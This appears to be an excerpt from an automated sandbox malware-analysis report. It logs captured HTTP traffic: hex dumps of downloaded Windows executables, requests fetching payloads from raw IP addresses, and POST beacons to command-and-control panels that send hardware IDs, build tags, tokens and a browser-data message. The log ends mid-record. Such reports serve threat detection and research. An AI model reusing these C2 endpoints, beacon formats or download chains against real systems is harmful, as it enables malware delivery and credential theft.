00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 40 05 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 50 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 62 6a 67 72 62 6b 62 00 80 19 00 00 30 2f 00 00 76 19 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 69 71 73 70 6a 66 6a 00 10 00 00 00 b0 48 00 00 04 00 00 00 d0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 48 00 00 22 00 00 00 d4 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 04:10:27 GMTContent-Type: application/octet-streamContent-Length: 1801728Last-Modified: Tue, 10 Dec 2024 03:29:17 GMTConnection: keep-aliveETag: "6757b58d-1b7e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 10 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 69 00 00 04 00 00 4a 27 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6e 75 76 77 64 78 6e 00 e0 19 00 00 20 4f 00 00 da 19 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 76 69 69 66 64 64 64 00 10 00 00 00 00 69 00 00 04 00 00 00 58 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 69 00 00 22 00 00 00 5c 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 04:10:36 GMTContent-Type: application/octet-streamContent-Length: 968192Last-Modified: Tue, 10 Dec 2024 03:27:27 GMTConnection: keep-aliveETag: "6757b51f-ec600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 17 b5 57 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 16 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 0f 00 00 04 00 00 76 36 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 e4 5a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e4 5a 01 00 00 40 0d 00 00 5c 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 a0 0e 00 00 76 00 00 00 50 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 10 Dec 2024 04:10:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 04:10:43 GMTContent-Type: application/octet-streamContent-Length: 2800128Last-Modified: Tue, 10 Dec 2024 03:27:52 GMTConnection: keep-aliveETag: "6757b538-2aba00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 9b 04 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 70 7a 6d 79 61 61 78 72 00 60 2a 00 00 a0 00 00 00 5a 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 6b 63 77 6d 7a 74 77 00 20 00 00 00 00 2b 00 00 04 00 00 00 94 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2b 00 00 22 00 00 00 98 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 10 Dec 2024 04:10:53 GMTContent-Type: application/octet-streamContent-Length: 2800128Last-Modified: Tue, 10 Dec 2024 03:27:54 GMTConnection: keep-aliveETag: "6757b53a-2aba00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 9b 04 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 70 7a 6d 79 61 61 78 72 00 60 2a 00 00 a0 00 00 00 5a 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 6b 63 77 6d 7a 74 77 00 20 00 00 00 00 2b 00 00 04 00 00 00 94 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2b 00 00 22 00 00 00 98 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 35 32 46 37 36 42 33 35 30 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B52F76B35082D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 36 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013605001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 36 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013606001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 36 30 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013607001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHCAKKEGCAAFHJJJDBKHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 46 45 32 32 32 46 45 46 42 34 33 37 35 30 37 37 33 35 36 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 2d 2d 0d 0a Data Ascii: ------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="hwid"9EFE222FEFB43750773564------EGHCAKKEGCAAFHJJJDBKContent-Disposition: form-data; name="build"stok------EGHCAKKEGCAAFHJJJDBK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJDHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 32 63 61 63 34 65 61 65 63 33 66 66 37 64 38 62 64 30 32 33 35 38 65 62 64 32 39 38 30 32 38 62 33 61 66 61 62 33 32 62 61 62 65 32 34 39 62 34 35 61 33 30 39 31 33 33 33 39 37 61 61 64 31 66 34 33 38 32 31 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 41 45 43 41 45 42 4b 4a 4a 4a 4b 45 42 4b 4b 4a 44 2d 2d 0d 0a Data Ascii: ------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="token"812cac4eaec3ff7d8bd02358ebd298028b3afab32babe249b45a309133397aad1f43821d------KJDAECAEBKJJJKEBKKJDContent-Disposition: form-data; name="message"browsers------KJDAECAEBKJJJKEBKKJD--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECFIEBGCAKJKECGCFIHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 32 63 61 63 34 65 61 65 63 33 66 66 37 64 38 62 64 30 32 33 35 38 65 62 64 32 39 38 30 32 38 62 33 61 66 61 62 33 32 62 61 62 65 32 34 39 62 34 35 61 33 30 39 31 33 33 33 39 37 61 61 64 31 66 34 33 38 32 31 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 